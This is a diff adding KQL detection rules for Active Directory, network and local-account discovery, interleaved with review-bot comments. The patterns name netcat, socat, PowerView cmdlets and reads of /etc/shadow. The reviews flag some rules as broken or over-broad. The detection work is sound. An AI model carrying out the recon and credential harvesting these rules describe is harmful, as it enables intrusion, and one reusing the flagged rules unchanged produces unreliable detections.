ProcessCommandLine contains "Get-DomainDFSShare" or ProcessCommandLine contains "Get-DomainDNSRecord" or ProcessCommandLine contains "Get-DomainFileServer" or ProcessCommandLine contains "Get-DomainForeign" or ProcessCommandLine contains "Get-DomainGPO" or ProcessCommandLine contains 
"Get-DomainGroup" or ProcessCommandLine contains "Get-DomainGUIDMap" or ProcessCommandLine contains "Get-DomainManagedSecurityGroup" or ProcessCommandLine contains "Get-DomainObject" or ProcessCommandLine contains "Get-DomainOU" or ProcessCommandLine contains "Get-DomainPolicy" or ProcessCommandLine contains "Get-DomainSID" or ProcessCommandLine contains "Get-DomainSite" or ProcessCommandLine contains "Get-DomainSPNTicket" or ProcessCommandLine contains "Get-DomainSubnet" or ProcessCommandLine contains "Get-DomainTrust" or ProcessCommandLine contains "Get-DomainUserEvent" or ProcessCommandLine contains "Get-ForestDomain" or ProcessCommandLine contains "Get-ForestGlobalCatalog" or ProcessCommandLine contains "Get-ForestTrust" or ProcessCommandLine contains "Get-GptTmpl" or ProcessCommandLine contains "Get-GroupsXML" or ProcessCommandLine contains "Get-LastLoggedOn" or ProcessCommandLine contains "Get-LoggedOnLocal" or ProcessCommandLine contains "Get-NetComputer" or ProcessCommandLine contains "Get-NetDomain" or ProcessCommandLine contains "Get-NetFileServer" or ProcessCommandLine contains "Get-NetForest" or ProcessCommandLine contains "Get-NetGPO" or ProcessCommandLine contains "Get-NetGroupMember" or ProcessCommandLine contains "Get-NetLocalGroup" or ProcessCommandLine contains "Get-NetLoggedon" or ProcessCommandLine contains "Get-NetOU" or ProcessCommandLine contains "Get-NetProcess" or ProcessCommandLine contains "Get-NetRDPSession" or ProcessCommandLine contains "Get-NetSession" or ProcessCommandLine contains "Get-NetShare" or ProcessCommandLine contains "Get-NetSite" or ProcessCommandLine contains "Get-NetSubnet" or ProcessCommandLine contains "Get-NetUser" or ProcessCommandLine contains "Get-PathAcl" or ProcessCommandLine contains "Get-PrincipalContext" or ProcessCommandLine contains "Get-RegistryMountedDrive" or ProcessCommandLine contains "Get-RegLoggedOn" or ProcessCommandLine contains "Get-WMIRegCachedRDPConnection" or ProcessCommandLine contains 
"Get-WMIRegLastLoggedOn" or ProcessCommandLine contains "Get-WMIRegMountedDrive" or ProcessCommandLine contains "Get-WMIRegProxy" or ProcessCommandLine contains "Invoke-ACLScanner" or ProcessCommandLine contains "Invoke-CheckLocalAdminAccess" or ProcessCommandLine contains "Invoke-Kerberoast" or ProcessCommandLine contains "Invoke-MapDomainTrust" or ProcessCommandLine contains "Invoke-RevertToSelf" or ProcessCommandLine contains "Invoke-Sharefinder" or ProcessCommandLine contains "Invoke-UserImpersonation" or ProcessCommandLine contains "Remove-DomainObjectAcl" or ProcessCommandLine contains "Remove-RemoteConnection" or ProcessCommandLine contains "Request-SPNTicket" or ProcessCommandLine contains "Set-DomainObject" or ProcessCommandLine contains "Test-AdminAccess") \ No newline at end of file diff --git a/KQL/rules/Discovery/hacktool_soaphound_execution.kql b/KQL/rules/Discovery/hacktool_soaphound_execution.kql new file mode 100644 index 00000000..34ad28ef --- /dev/null +++ b/KQL/rules/Discovery/hacktool_soaphound_execution.kql @@ -0,0 +1,11 @@ +// Title: HackTool - SOAPHound Execution +// Author: @kostastsale +// Date: 2024-01-26 +// Level: high +// Description: Detects the execution of SOAPHound, a .NET tool for collecting Active Directory data, using specific command-line arguments that may indicate an attempt to extract sensitive AD information. + +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1087 + +DeviceProcessEvents +| where (ProcessCommandLine contains " --buildcache " or ProcessCommandLine contains " --bhdump " or ProcessCommandLine contains " --certdump " or ProcessCommandLine contains " --dnsdump ") and (ProcessCommandLine contains " -c " or ProcessCommandLine contains " --cachefilename " or ProcessCommandLine contains " -o " or ProcessCommandLine contains " --outputdirectory") \ No newline at end of file 
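Review bot: The SharpView Description ("Adversaries may look for details about the network configuration and settings of systems they access ...") appears to be copied verbatim from the Netsh firewall rule two lines earlier and does not describe what this rule detects. A header that matches the query would be `// Description: Detects SharpView execution via its image name, original filename, or PowerView-style cmdlet names passed on the command line.` The cmdlet list is only visible in ProcessCommandLine when passed inline, which is worth stating under False Positives/limitations so analysts do not expect script-file invocations to be caught.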
diff --git a/KQL/rules/Discovery/hacktool_trufflesnout_execution.kql b/KQL/rules/Discovery/hacktool_trufflesnout_execution.kql new file mode 100644 index 00000000..8d00d224 --- /dev/null +++ b/KQL/rules/Discovery/hacktool_trufflesnout_execution.kql @@ -0,0 +1,10 @@ +// Title: HackTool - TruffleSnout Execution +// Author: frack113 +// Date: 2022-08-20 +// Level: high +// Description: Detects the use of TruffleSnout.exe an iterative AD discovery toolkit for offensive operators, situational awareness and targeted low noise enumeration. +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1482 + +DeviceProcessEvents +| where ProcessVersionInfoOriginalFileName =~ "TruffleSnout.exe" or FolderPath endswith "\\TruffleSnout.exe" \ No newline at end of file diff --git a/KQL/rules/Discovery/harvesting_of_wifi_credentials_via_netsh_exe.kql b/KQL/rules/Discovery/harvesting_of_wifi_credentials_via_netsh_exe.kql new file mode 100644 index 00000000..25d15566 --- /dev/null +++ b/KQL/rules/Discovery/harvesting_of_wifi_credentials_via_netsh_exe.kql @@ -0,0 +1,10 @@ +// Title: Harvesting Of Wifi Credentials Via Netsh.EXE +// Author: Andreas Hunkeler (@Karneades), oscd.community +// Date: 2020-04-20 +// Level: medium +// Description: Detect the harvesting of wifi credentials using netsh.exe +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.credential-access, attack.t1040 + +DeviceProcessEvents +| where (ProcessCommandLine contains "wlan" and ProcessCommandLine contains " s" and ProcessCommandLine contains " p" and ProcessCommandLine contains " k" and ProcessCommandLine contains "=clear") and (FolderPath endswith "\\netsh.exe" or ProcessVersionInfoOriginalFileName =~ "netsh.exe") \ No newline at end of file diff --git a/KQL/rules/Discovery/linux_network_service_scanning_tools_execution.kql b/KQL/rules/Discovery/linux_network_service_scanning_tools_execution.kql new file mode 100644 index 00000000..0dd0897b --- /dev/null 
+++ b/KQL/rules/Discovery/linux_network_service_scanning_tools_execution.kql @@ -0,0 +1,12 @@ +// Title: Linux Network Service Scanning Tools Execution +// Author: Alejandro Ortuno, oscd.community, Georg Lauenstein (sure[secure]) +// Date: 2020-10-21 +// Level: low +// Description: Detects execution of network scanning and reconnaisance tools. These tools can be used for the enumeration of local or remote network services for example. +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1046 +// False Positives: +// - Legitimate administration activities + +DeviceProcessEvents +| where ((FolderPath endswith "/nc" or FolderPath endswith "/ncat" or FolderPath endswith "/netcat" or FolderPath endswith "/socat") and (not((ProcessCommandLine contains " --listen " or ProcessCommandLine contains " -l ")))) or (FolderPath endswith "/autorecon" or FolderPath endswith "/hping" or FolderPath endswith "/hping2" or FolderPath endswith "/hping3" or FolderPath endswith "/naabu" or FolderPath endswith "/nmap" or FolderPath endswith "/nping" or FolderPath endswith "/telnet" or FolderPath endswith "/zenmap") \ No newline at end of file diff --git a/KQL/rules/Discovery/linux_remote_system_discovery.kql b/KQL/rules/Discovery/linux_remote_system_discovery.kql new file mode 100644 index 00000000..c993b989 --- /dev/null +++ b/KQL/rules/Discovery/linux_remote_system_discovery.kql 
@@ -0,0 +1,12 @@ +// Title: Linux Remote System Discovery +// Author: Alejandro Ortuno, oscd.community +// Date: 2020-10-22 +// Level: low +// Description: Detects the enumeration of other remote systems. +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1018 +// False Positives: +// - Legitimate administration activities + +DeviceProcessEvents +| where (ProcessCommandLine contains "-a" and FolderPath endswith "/arp") or ((ProcessCommandLine contains " 10." or ProcessCommandLine contains " 192.168." or ProcessCommandLine contains " 172.16." or ProcessCommandLine contains " 172.17." or ProcessCommandLine contains " 172.18." or ProcessCommandLine contains " 172.19." or ProcessCommandLine contains " 172.20." or ProcessCommandLine contains " 172.21." or ProcessCommandLine contains " 172.22." or ProcessCommandLine contains " 172.23." or ProcessCommandLine contains " 172.24." or ProcessCommandLine contains " 172.25." or ProcessCommandLine contains " 172.26." or ProcessCommandLine contains " 172.27." or ProcessCommandLine contains " 172.28." or ProcessCommandLine contains " 172.29." or ProcessCommandLine contains " 172.30." or ProcessCommandLine contains " 172.31." or ProcessCommandLine contains " 127." or ProcessCommandLine contains " 169.254.") and FolderPath endswith "/ping") \ No newline at end of file diff --git a/KQL/rules/Discovery/local_accounts_discovery.kql b/KQL/rules/Discovery/local_accounts_discovery.kql new file mode 100644 index 00000000..5eedc70d --- /dev/null +++ b/KQL/rules/Discovery/local_accounts_discovery.kql 
@@ -0,0 +1,12 @@ +// Title: Local Accounts Discovery +// Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community +// Date: 2019-10-21 +// Level: low +// Description: Local accounts, System Owner/User discovery using operating systems utilities +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1033, attack.t1087.001 +// False Positives: +// - Legitimate administrator or user enumerates local users for legitimate reason + +DeviceProcessEvents +| where (((ProcessCommandLine contains " /c" and ProcessCommandLine contains "dir " and ProcessCommandLine contains "\\Users\\") and FolderPath endswith "\\cmd.exe") and (not(ProcessCommandLine contains " rmdir "))) or ((ProcessCommandLine contains "user" and (FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe")) and (not((ProcessCommandLine contains "/domain" or ProcessCommandLine contains "/add" or ProcessCommandLine contains "/delete" or ProcessCommandLine contains "/active" or ProcessCommandLine contains "/expires" or ProcessCommandLine contains "/passwordreq" or ProcessCommandLine contains "/scriptpath" or ProcessCommandLine contains "/times" or ProcessCommandLine contains "/workstations")))) or ((ProcessCommandLine contains " /l" and FolderPath endswith "\\cmdkey.exe") or ((FolderPath endswith "\\whoami.exe" or FolderPath endswith "\\quser.exe" or FolderPath endswith "\\qwinsta.exe") or (ProcessVersionInfoOriginalFileName in~ ("whoami.exe", "quser.exe", "qwinsta.exe"))) or ((ProcessCommandLine contains "useraccount" and ProcessCommandLine contains "get") and FolderPath endswith "\\wmic.exe")) \ No newline at end of file diff --git a/KQL/rules/Discovery/local_groups_discovery_linux.kql b/KQL/rules/Discovery/local_groups_discovery_linux.kql new file mode 100644 index 00000000..36d18147 --- /dev/null +++ b/KQL/rules/Discovery/local_groups_discovery_linux.kql 
@@ -0,0 +1,12 @@
+// Title: Local Groups Discovery - Linux
+// Author: Ömer Günal, Alejandro Ortuno, oscd.community
+// Date: 2020-10-11
+// Level: low
+// Description: Detects enumeration of local system groups. Adversaries may attempt to find local system groups and permission settings
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1069.001
+// False Positives:
+// - Legitimate administration activities
+
+DeviceProcessEvents
+| where FolderPath endswith "/groups" or (ProcessCommandLine contains "/etc/group" and (FolderPath endswith "/cat" or FolderPath endswith "/ed" or FolderPath endswith "/head" or FolderPath endswith "/less" or FolderPath endswith "/more" or FolderPath endswith "/nano" or FolderPath endswith "/tail" or FolderPath endswith "/vi" or FolderPath endswith "/vim"))
\ No newline at end of file
diff --git a/KQL/rules/Discovery/local_groups_discovery_macos.kql b/KQL/rules/Discovery/local_groups_discovery_macos.kql
new file mode 100644
index 00000000..164d2d7c
--- /dev/null
+++ b/KQL/rules/Discovery/local_groups_discovery_macos.kql
@@ -0,0 +1,12 @@
+// Title: Local Groups Discovery - MacOs
+// Author: Ömer Günal, Alejandro Ortuno, oscd.community
+// Date: 2020-10-11
+// Level: informational
+// Description: Detects enumeration of local system groups
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1069.001
+// False Positives:
+// - Legitimate administration activities
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "-q" and ProcessCommandLine contains "group") and FolderPath endswith "/dscacheutil") or (ProcessCommandLine contains "/etc/group" and FolderPath endswith "/cat") or ((ProcessCommandLine contains "-list" and ProcessCommandLine contains "/groups") and FolderPath endswith "/dscl")
\ No newline at end of file
diff --git a/KQL/rules/Discovery/local_groups_reconnaissance_via_wmic_exe.kql b/KQL/rules/Discovery/local_groups_reconnaissance_via_wmic_exe.kql
new file mode 100644
index 00000000..0fb156fc
--- /dev/null
+++ b/KQL/rules/Discovery/local_groups_reconnaissance_via_wmic_exe.kql
@@ -0,0 +1,14 @@
+// Title: Local Groups Reconnaissance Via Wmic.EXE
+// Author: frack113
+// Date: 2021-12-12
+// Level: low
+// Description: Detects the execution of "wmic" with the "group" flag.
+Adversaries may attempt to find local system groups and permission settings.
+The knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group.
+Adversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group.
+
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1069.001
+
+DeviceProcessEvents
+| where ProcessCommandLine contains " group" and (FolderPath endswith "\\wmic.exe" or ProcessVersionInfoOriginalFileName =~ "wmic.exe")
\ No newline at end of file
diff --git a/KQL/rules/Discovery/local_system_accounts_discovery_linux.kql b/KQL/rules/Discovery/local_system_accounts_discovery_linux.kql
new file mode 100644
index 00000000..fd3026f9
--- /dev/null
+++ b/KQL/rules/Discovery/local_system_accounts_discovery_linux.kql
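Review bot: The three continuation lines of the Description (`Adversaries may attempt to find ...`, `The knowledge of local system ...`, `Adversaries may use this information ...`) are emitted without the `//` prefix, so they are plain text rather than comments and the generated .kql file will not parse as a query. The converter should prefix every line of a multi-line Sigma description, e.g. `// Adversaries may attempt to find local system groups and permission settings.`. The same unprefixed continuation lines appear in the hunks for network_sniffing_macos.kql, pnscan_binary_data_transmission_activity.kql and pua_adidnsdump_execution.kql.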
@@ -0,0 +1,12 @@
+// Title: Local System Accounts Discovery - Linux
+// Author: Alejandro Ortuno, oscd.community, CheraghiMilad
+// Date: 2020-10-08
+// Level: low
+// Description: Detects enumeration of local systeam accounts. This information can help adversaries determine which local accounts exist on a system to aid in follow-on behavior.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1087.001
+// False Positives:
+// - Legitimate administration activities
+
+DeviceProcessEvents
+| where FolderPath endswith "/lastlog" or ProcessCommandLine contains "'x:0:'" or ((ProcessCommandLine contains "/etc/passwd" or ProcessCommandLine contains "/etc/shadow" or ProcessCommandLine contains "/etc/sudoers" or ProcessCommandLine contains "/etc/spwd.db" or ProcessCommandLine contains "/etc/pwd.db" or ProcessCommandLine contains "/etc/master.passwd") and (FolderPath endswith "/cat" or FolderPath endswith "/ed" or FolderPath endswith "/head" or FolderPath endswith "/more" or FolderPath endswith "/nano" or FolderPath endswith "/tail" or FolderPath endswith "/vi" or FolderPath endswith "/vim" or FolderPath endswith "/less" or FolderPath endswith "/emacs" or FolderPath endswith "/sqlite3" or FolderPath endswith "/makemap")) or FolderPath endswith "/id" or (ProcessCommandLine contains "-u" and FolderPath endswith "/lsof")
\ No newline at end of file
diff --git a/KQL/rules/Discovery/local_system_accounts_discovery_macos.kql b/KQL/rules/Discovery/local_system_accounts_discovery_macos.kql
new file mode 100644
index 00000000..e2ff4f81
--- /dev/null
+++ b/KQL/rules/Discovery/local_system_accounts_discovery_macos.kql
@@ -0,0 +1,12 @@
+// Title: Local System Accounts Discovery - MacOs
+// Author: Alejandro Ortuno, oscd.community
+// Date: 2020-10-08
+// Level: low
+// Description: Detects enumeration of local systeam accounts on MacOS
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1087.001
+// False Positives:
+// - Legitimate administration activities
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "list" and ProcessCommandLine contains "/users") and FolderPath endswith "/dscl") or ((ProcessCommandLine contains "-q" and ProcessCommandLine contains "user") and FolderPath endswith "/dscacheutil") or ProcessCommandLine contains "'x:0:'" or ((ProcessCommandLine contains "/etc/passwd" or ProcessCommandLine contains "/etc/sudoers") and FolderPath endswith "/cat") or FolderPath endswith "/id" or (ProcessCommandLine contains "-u" and FolderPath endswith "/lsof")
\ No newline at end of file
diff --git a/KQL/rules/Discovery/macos_network_service_scanning.kql b/KQL/rules/Discovery/macos_network_service_scanning.kql
new file mode 100644
index 00000000..24d422e1
--- /dev/null
+++ b/KQL/rules/Discovery/macos_network_service_scanning.kql
@@ -0,0 +1,12 @@
+// Title: MacOS Network Service Scanning
+// Author: Alejandro Ortuno, oscd.community
+// Date: 2020-10-21
+// Level: low
+// Description: Detects enumeration of local or remote network services.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1046
+// False Positives:
+// - Legitimate administration activities
+
+DeviceProcessEvents
+| where ((FolderPath endswith "/nc" or FolderPath endswith "/netcat") and (not(ProcessCommandLine contains "l"))) or (FolderPath endswith "/nmap" or FolderPath endswith "/telnet")
\ No newline at end of file
diff --git a/KQL/rules/Discovery/macos_remote_system_discovery.kql b/KQL/rules/Discovery/macos_remote_system_discovery.kql
new file mode 100644
index 00000000..375cf900
--- /dev/null
+++ b/KQL/rules/Discovery/macos_remote_system_discovery.kql
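Review bot: In macos_network_service_scanning.kql the exclusion `not(ProcessCommandLine contains "l")` drops every nc/netcat invocation whose command line contains the letter "l" anywhere (KQL `contains` is case-insensitive), so a target such as `localhost`, a hostname, or a path segment with an "l" in it suppresses the match. If the intent is the listen flag, anchor it to a flag cluster, e.g. `not(ProcessCommandLine matches regex "(^|\\s)-[a-zA-Z]*l")`. This may be a literal carry-over of the upstream Sigma filter, but it leaves the nc branch of the rule close to inert and is worth tightening in the converter output.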
@@ -0,0 +1,12 @@
+// Title: Macos Remote System Discovery
+// Author: Alejandro Ortuno, oscd.community
+// Date: 2020-10-22
+// Level: informational
+// Description: Detects the enumeration of other remote systems.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1018
+// False Positives:
+// - Legitimate administration activities
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "-a" and FolderPath endswith "/arp") or ((ProcessCommandLine contains " 10." or ProcessCommandLine contains " 192.168." or ProcessCommandLine contains " 172.16." or ProcessCommandLine contains " 172.17." or ProcessCommandLine contains " 172.18." or ProcessCommandLine contains " 172.19." or ProcessCommandLine contains " 172.20." or ProcessCommandLine contains " 172.21." or ProcessCommandLine contains " 172.22." or ProcessCommandLine contains " 172.23." or ProcessCommandLine contains " 172.24." or ProcessCommandLine contains " 172.25." or ProcessCommandLine contains " 172.26." or ProcessCommandLine contains " 172.27." or ProcessCommandLine contains " 172.28." or ProcessCommandLine contains " 172.29." or ProcessCommandLine contains " 172.30." or ProcessCommandLine contains " 172.31." or ProcessCommandLine contains " 127." or ProcessCommandLine contains " 169.254.") and FolderPath endswith "/ping")
\ No newline at end of file
diff --git a/KQL/rules/Discovery/network_reconnaissance_activity.kql b/KQL/rules/Discovery/network_reconnaissance_activity.kql
new file mode 100644
index 00000000..109e83da
--- /dev/null
+++ b/KQL/rules/Discovery/network_reconnaissance_activity.kql
@@ -0,0 +1,12 @@
+// Title: Network Reconnaissance Activity
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-02-07
+// Level: high
+// Description: Detects a set of suspicious network related commands often used in recon stages
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1087, attack.t1082, car.2016-03-001
+// False Positives:
+// - False positives depend on scripts and administrative tools used in the monitored environment
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "nslookup" and ProcessCommandLine contains "_ldap._tcp.dc._msdcs."
\ No newline at end of file
diff --git a/KQL/rules/Discovery/network_sniffing_macos.kql b/KQL/rules/Discovery/network_sniffing_macos.kql
new file mode 100644
index 00000000..3a12f8a6
--- /dev/null
+++ b/KQL/rules/Discovery/network_sniffing_macos.kql
@@ -0,0 +1,14 @@
+// Title: Network Sniffing - MacOs
+// Author: Alejandro Ortuno, oscd.community
+// Date: 2020-10-14
+// Level: informational
+// Description: Detects the usage of tooling to sniff network traffic.
+An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.
+
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.credential-access, attack.t1040
+// False Positives:
+// - Legitimate administration activities
+
+DeviceProcessEvents
+| where FolderPath endswith "/tcpdump" or FolderPath endswith "/tshark"
\ No newline at end of file
diff --git a/KQL/rules/Discovery/new_network_trace_capture_started_via_netsh_exe.kql b/KQL/rules/Discovery/new_network_trace_capture_started_via_netsh_exe.kql
new file mode 100644
index 00000000..9903a25e
--- /dev/null
+++ b/KQL/rules/Discovery/new_network_trace_capture_started_via_netsh_exe.kql
@@ -0,0 +1,12 @@
+// Title: New Network Trace Capture Started Via Netsh.EXE
+// Author: Kutepov Anton, oscd.community
+// Date: 2019-10-24
+// Level: medium
+// Description: Detects the execution of netsh with the "trace" flag in order to start a network capture
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.credential-access, attack.t1040
+// False Positives:
+// - Legitimate administration activity
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "trace" and ProcessCommandLine contains "start") and (FolderPath endswith "\\netsh.exe" or ProcessVersionInfoOriginalFileName =~ "netsh.exe")
\ No newline at end of file
diff --git a/KQL/rules/Discovery/nltest_exe_execution.kql b/KQL/rules/Discovery/nltest_exe_execution.kql
new file mode 100644
index 00000000..30f4ef74
--- /dev/null
+++ b/KQL/rules/Discovery/nltest_exe_execution.kql
@@ -0,0 +1,12 @@
+// Title: Nltest.EXE Execution
+// Author: Arun Chauhan
+// Date: 2023-02-03
+// Level: low
+// Description: Detects nltest commands that can be used for information discovery
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1016, attack.t1018, attack.t1482
+// False Positives:
+// - Legitimate administration activity
+
+DeviceProcessEvents
+| where FolderPath endswith "\\nltest.exe" or ProcessVersionInfoOriginalFileName =~ "nltestrk.exe"
\ No newline at end of file
diff --git a/KQL/rules/Discovery/notepad_password_files_discovery.kql b/KQL/rules/Discovery/notepad_password_files_discovery.kql
new file mode 100644
index 00000000..8d0e8b2b
--- /dev/null
+++ b/KQL/rules/Discovery/notepad_password_files_discovery.kql
@@ -0,0 +1,12 @@
+// Title: Notepad Password Files Discovery
+// Author: The DFIR Report
+// Date: 2025-02-21
+// Level: low
+// Description: Detects the execution of Notepad to open a file that has the string "password" which may indicate unauthorized access to credentials or suspicious activity.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1083
+// False Positives:
+// - Legitimate use of opening files from remote hosts by administrators or users. However, storing passwords in text readable format could potentially be a violation of the organization's policy. Any match should be investigated further.
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "password" and ProcessCommandLine contains ".txt") or (ProcessCommandLine contains "password" and ProcessCommandLine contains ".csv") or (ProcessCommandLine contains "password" and ProcessCommandLine contains ".doc") or (ProcessCommandLine contains "password" and ProcessCommandLine contains ".xls")) and FolderPath endswith "\\notepad.exe" and InitiatingProcessFolderPath endswith "\\explorer.exe"
\ No newline at end of file
diff --git a/KQL/rules/Discovery/obfuscated_ip_download_activity.kql b/KQL/rules/Discovery/obfuscated_ip_download_activity.kql
new file mode 100644
index 00000000..8ab99f01
--- /dev/null
+++ b/KQL/rules/Discovery/obfuscated_ip_download_activity.kql
@@ -0,0 +1,10 @@
+// Title: Obfuscated IP Download Activity
+// Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems)
+// Date: 2022-08-03
+// Level: medium
+// Description: Detects use of an encoded/obfuscated version of an IP address (hex, octal...) in an URL combined with a download command
+// MITRE Tactic: Discovery
+// Tags: attack.discovery
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "Invoke-WebRequest" or ProcessCommandLine contains "iwr " or ProcessCommandLine contains "Invoke-RestMethod" or ProcessCommandLine contains "irm " or ProcessCommandLine contains "wget " or ProcessCommandLine contains "curl " or ProcessCommandLine contains "DownloadFile" or ProcessCommandLine contains "DownloadString") and ((ProcessCommandLine contains " 0x" or ProcessCommandLine contains "//0x" or ProcessCommandLine contains ".0x" or ProcessCommandLine contains ".00x") or (ProcessCommandLine contains "http://%" and ProcessCommandLine contains "%2e") or (ProcessCommandLine matches regex "https?://[0-9]{1,3}\\.[0-9]{1,3}\\.0[0-9]{3,4}" or ProcessCommandLine matches regex "https?://[0-9]{1,3}\\.0[0-9]{3,7}" or ProcessCommandLine matches regex "https?://0[0-9]{3,11}" or ProcessCommandLine matches regex "https?://(0[0-9]{1,11}\\.){3}0[0-9]{1,11}" or ProcessCommandLine matches regex "https?://0[0-9]{1,11}" or ProcessCommandLine matches regex " [0-7]{7,13}")) and (not(ProcessCommandLine matches regex "https?://((25[0-5]|(2[0-4]|1\\d|[1-9])?\\d)(\\.|\\b)){4}"))
\ No newline at end of file
diff --git a/KQL/rules/Discovery/obfuscated_ip_via_cli.kql b/KQL/rules/Discovery/obfuscated_ip_via_cli.kql
new file mode 100644
index 00000000..17246363
--- /dev/null
+++ b/KQL/rules/Discovery/obfuscated_ip_via_cli.kql
@@ -0,0 +1,10 @@
+// Title: Obfuscated IP Via CLI
+// Author: Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems)
+// Date: 2022-08-03
+// Level: medium
+// Description: Detects usage of an encoded/obfuscated version of an IP address (hex, octal, etc.) via command line
+// MITRE Tactic: Discovery
+// Tags: attack.discovery
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\ping.exe" or FolderPath endswith "\\arp.exe") and ((ProcessCommandLine contains " 0x" or ProcessCommandLine contains "//0x" or ProcessCommandLine contains ".0x" or ProcessCommandLine contains ".00x") or (ProcessCommandLine contains "http://%" and ProcessCommandLine contains "%2e") or (ProcessCommandLine matches regex "https?://[0-9]{1,3}\\.[0-9]{1,3}\\.0[0-9]{3,4}" or ProcessCommandLine matches regex "https?://[0-9]{1,3}\\.0[0-9]{3,7}" or ProcessCommandLine matches regex "https?://0[0-9]{3,11}" or ProcessCommandLine matches regex "https?://(0[0-9]{1,11}\\.){3}0[0-9]{1,11}" or ProcessCommandLine matches regex "https?://0[0-9]{1,11}" or ProcessCommandLine matches regex " [0-7]{7,13}")) and (not(ProcessCommandLine matches regex "https?://((25[0-5]|(2[0-4]|1\\d|[1-9])?\\d)(\\.|\\b)){4}"))
\ No newline at end of file
diff --git a/KQL/rules/Discovery/os_architecture_discovery_via_grep.kql b/KQL/rules/Discovery/os_architecture_discovery_via_grep.kql
new file mode 100644
index 00000000..49bf1bae
--- /dev/null
+++ b/KQL/rules/Discovery/os_architecture_discovery_via_grep.kql
@@ -0,0 +1,11 @@
+// Title: OS Architecture Discovery Via Grep
+// Author: Joseliyo Sanchez, @Joseliyo_Jstnk
+// Date: 2023-06-02
+// Level: low
+// Description: Detects the use of grep to identify information about the operating system architecture. Often combined beforehand with the execution of "uname" or "cat /proc/cpuinfo"
+
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1082
+
+DeviceProcessEvents
+| where (ProcessCommandLine endswith "aarch64" or ProcessCommandLine endswith "arm" or ProcessCommandLine endswith "i386" or ProcessCommandLine endswith "i686" or ProcessCommandLine endswith "mips" or ProcessCommandLine endswith "x86_64") and FolderPath endswith "/grep"
\ No newline at end of file
diff --git a/KQL/rules/Discovery/permission_check_via_accesschk_exe.kql b/KQL/rules/Discovery/permission_check_via_accesschk_exe.kql
new file mode 100644
index 00000000..9d06690e
--- /dev/null
+++ b/KQL/rules/Discovery/permission_check_via_accesschk_exe.kql
@@ -0,0 +1,12 @@
+// Title: Permission Check Via Accesschk.EXE
+// Author: Teymur Kheirkhabarov (idea), Mangatas Tondang, oscd.community, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2020-10-13
+// Level: medium
+// Description: Detects the usage of the "Accesschk" utility, an access and privilege audit tool developed by SysInternal and often being abused by attacker to verify process privileges
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1069.001
+// False Positives:
+// - System administrator Usage
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "uwcqv " or ProcessCommandLine contains "kwsu " or ProcessCommandLine contains "qwsu " or ProcessCommandLine contains "uwdqs ") and (ProcessVersionInfoProductName endswith "AccessChk" or ProcessVersionInfoFileDescription contains "Reports effective permissions" or (FolderPath endswith "\\accesschk.exe" or FolderPath endswith "\\accesschk64.exe") or ProcessVersionInfoOriginalFileName =~ "accesschk.exe")
\ No newline at end of file
diff --git a/KQL/rules/Discovery/pktmon_exe_execution.kql b/KQL/rules/Discovery/pktmon_exe_execution.kql
new file mode 100644
index 00000000..33b2823c
--- /dev/null
+++ b/KQL/rules/Discovery/pktmon_exe_execution.kql
@@ -0,0 +1,12 @@
+// Title: PktMon.EXE Execution
+// Author: frack113
+// Date: 2022-03-17
+// Level: medium
+// Description: Detects execution of PktMon, a tool that captures network packets.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.credential-access, attack.t1040
+// False Positives:
+// - Legitimate use
+
+DeviceProcessEvents
+| where FolderPath endswith "\\pktmon.exe" or ProcessVersionInfoOriginalFileName =~ "PktMon.exe"
\ No newline at end of file
diff --git a/KQL/rules/Discovery/pnscan_binary_data_transmission_activity.kql b/KQL/rules/Discovery/pnscan_binary_data_transmission_activity.kql
new file mode 100644
index 00000000..18f18f6b
--- /dev/null
+++ b/KQL/rules/Discovery/pnscan_binary_data_transmission_activity.kql
@@ -0,0 +1,12 @@
+// Title: Pnscan Binary Data Transmission Activity
+// Author: David Burkett (@signalblur)
+// Date: 2024-04-16
+// Level: medium
+// Description: Detects command line patterns associated with the use of Pnscan for sending and receiving binary data across the network.
+This behavior has been identified in a Linux malware campaign targeting Docker, Apache Hadoop, Redis, and Confluence and was previously used by the threat actor known as TeamTNT
+
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1046
+
+DeviceProcessEvents
+| where ProcessCommandLine matches regex "-(W|R)\\s?(\\s|"|')([0-9a-fA-F]{2}\\s?){2,20}(\\s|"|')"
\ No newline at end of file
